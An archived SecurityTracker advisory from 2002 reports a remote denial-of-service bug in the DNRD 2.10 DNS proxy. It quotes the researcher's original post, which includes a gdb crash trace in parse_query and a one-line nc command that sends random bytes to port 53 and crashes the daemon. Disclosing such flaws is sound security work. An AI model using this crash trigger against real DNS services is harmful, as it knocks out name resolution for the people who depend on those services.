Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Generic)  >   DNRD Vendors:   Garcia, Brad
Domain Name Relay Daemon (DNRD) Can Be Crashed By Remote Users Sending Certain DNS Requests
SecurityTracker Alert ID:  1003314
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 22 2002
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 2.10
Description:   A denial of service vulnerability was reported in the Domain Name Relay Daemon (DNRD) proxy name server. A remote user can send certain DNS requests to cause the DNS service to crash.

It is reported that malformed DNS requests and replies can cause the DNRD daemon to crash.

According to the report, the parse_query and get_objectname() functions may not properly process certain types of DNS messages.

Some demonstration exploit transcripts are provided in the Source Message.

Impact:   A remote user can send certain DNS messages to cause the DNRD daemon to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents

Subject:  dnrd 2.10 dos

Program: dnrd
Version: 2.10
Distro: n/a


There are various problems with dnrd's dns request and reply functions, that
cause it to crash.


Using two consoles, I did the following

Terminal one got:

[andrewg@blackhole /data/audit/dnrd-2.10/src]$ gdb dnrd
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
(gdb) set arg -s -d
(gdb) run
Starting program: /data/audit/dnrd-2.10/src/dnrd -d
[New Thread 1024 (LWP 3249)]
ERROR: Couldn't kill dnrd: No such process
Debug: cache low/high: 800/1000
Debug: initialising master DNS database
Debug: no master configuration: /etc/dnrd/master
Debug: initialising from /etc/hosts, domain= <none>
Debug: /etc/hosts: 3 records

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1024 (LWP 3249)]
parse_query (y=0xbffff140, msg=0xb4bffff7 <Address 0xb4bffff7 out of bounds>,
    len=1346377321) at dns.c:298
298         if (ntohs(((short int *) msg)[2]) == 0) {       /* C is nice. */

Note that the ? are various control charatchers that I couldn't paste in,
'cause they are not printable and kept stuffing up vim.

While one terminal two, I did:

dd if=/dev/urandom bs=64 count=1 | nc -u 53 -w 1

At one stage I also had msg=0x2e2e2e2e <Address 0x2e2e2e2e out of bounds>.

It's not just parse_query that has this problem, but also places like get_objectname()


So far I haven't tried to exploit it, but given some of the stuff that I've
seen, I would not be surprised if it was.

Even if their was an exploit, it'd have to work out a way of getting root in a
chroot jail and a non-root acct.


People who use this, or distro's that do, such as smoothwall. :P



Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC